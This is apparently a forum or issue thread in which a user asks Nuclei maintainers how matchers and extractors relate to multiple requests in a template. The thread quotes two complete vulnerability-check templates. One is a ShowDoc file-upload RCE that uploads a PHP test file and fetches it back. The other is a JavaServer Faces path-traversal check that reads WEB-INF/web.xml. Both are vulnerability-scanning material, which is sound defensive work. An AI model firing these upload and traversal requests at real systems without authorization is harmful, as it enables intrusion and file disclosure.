How to make sure multiple matcher match which raw or path?

[Nyx2022]

for example,

id: showdoc-file-upload-rce

info:
  name: Showdoc < 2.8.6 File Upload RCE
  author: pikpikcu
  severity: critical
  reference: https://github.com/star7th/showdoc/pull/1059
  tags: rce,fileupload,showdoc

requests:
  - raw:
      - |
        POST /index.php?s=/home/page/uploadImg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
        Content-Length: 239
        Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
        Accept-Encoding: gzip

        ----------------------------835846770881083140190633
        Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
        Content-Type: text/plain

        <?php echo md5('rce_test');?>
        ----------------------------835846770881083140190633--

      - |
        GET /Public/Uploads{{url_decode("§path§")}} HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

    extractors:
      - type: regex
        name: path
        group: 1
        internal: true
        part: body
        regex:
          - '/Uploads\\(.*?)"\,"success"'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '3c7cb9f46815a790686b857fdbc4295a'

      - type: status
        status:
          - 200

there are 2 matchers，and there are two raw,as we know, the first matcher match the second raw ,the second matcher match the first raw .so i think it's Doutful and chaosly. i wanna inter the nuclei, how it make sure which matcher match which raw or path, wish your answers,thanks

i also wanna know how to make sure the relationships between multiple extrators and multiple raws

[ehsandeep]

Hi @Nyx2020,

Matchers are marked as true when all the defined conditions in templates are true.

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '3c7cb9f46815a790686b857fdbc4295a'

      - type: status
        status:
          - 200

We had two matchers with AND conditions in the example above, which implies both criteria have to be true to return matched results.

Matchers are not tied to specific requests by default; they will return true for any request that matches the defined condition. Matchers are always defined uniquely in such a way that they will only match for a successful response; in the above case, matches are practically defined for the second request. This is why it's critical to write unique matchers for templates.

We've also had to develop request-specific matchers in scenarios where there are numerous requests, so nuclei also supports request-specific matchers with request conditions.

Here are several templates that make use of request specific matchers - https://github.com/projectdiscovery/nuclei-templates/search?q=req-condition

---

i also wanna know how to make sure the relationships between multiple extractors and multiple raws

You don't need to write request-specific extractors the same way you don't need to write matchers, just make sure they're unique enough to match just your specific request.

[Nyx2022]

so,perhaps i can think the steps as follow

1. the first raw post a exp to target,which will return a 200 and the uploaded file's url, so the second matcher (- type: status) match it,return true.and the only one extractor extract the data from first response?and will not extrct the 2nd raw and so on?
2. the the second raw get request is to check if the uploaded file is really existed ,and it will return 3c7cb9f46815a790686b857fdbc4295a as the response body and 200 as the status code,naturally,the first matcher match it,so,at this time,2 matchers are true,so the matchers part is true.so nuclei can decide the poc file is successfully executed.
3. when get the second response for the 2nd request,it's no need to use the second matcher (- type: status ) to match it ,because the second matcher has matched the first raw(which is true),only when the second matcher has not matched it will keep on match the second request?
4. if there are another extractors that are not extract anything from the first raw's response,they will extract the second raw and soon?

so am i right?

[ehsandeep]

Yes, absolutely right, status matcher is not mandatory to use in this case, as the response is unique enough. We just used two matcher as general practice to follow.

All your points are correct.

[Nyx2022]

I an very very extremely appreciative of your friendly answers!Thanks
perhaps i have another little questions

1. if all raw or method(in other yaml files includes method、data……) has runned,but there are some matchers in matcher part that not return true,if matchers-condition: and is markedso the matchers part will return true?
2. when the last x steps has runned,and the x+1 steps need some values from the last x steps,however ,there are some steps are not executed correctly ,so there is at least one can not be replace in the x+1 step,at this case,nuclei will mark it as failure to run this yaml file,and will not run the x+1 step and so on
3. i.m puzzled whether my last replais also suit for this yaml file:

id: CVE-2013-3827

info:
name: Javafaces LFI
author: Random-Robbie
severity: medium
description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
tags: cve,cve2013,lfi,javafaces,oracle
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827
- https://www.exploit-db.com/exploits/38802

requests:

• method: GET
  path:

  • "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
  • "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
  • "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
  • "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
  • "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
  • "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
  • "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
  • "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
  • "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
  • "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."

  matchers-condition: and
  matchers:

  • type: word
    words:

    • "<web-app"
    • ""
      part: body
      condition: and

  • type: status
    status:

    • 200

so am i right?

[ehsandeep]

I'm not sure if I understood all the points, but from the overview what I can say is, each {{BaseURL}} is a unique request, and as matchers-condition: and is used, any request with both true conditions will return results, it can be signal or multiple paths.

Also, you can define HTTP requests in two ways in the template, one is using {{BaseURL}} like the above example and the other one using RAW format.

Everything is documented here for future reference - https://nuclei.projectdiscovery.io/templating-guide/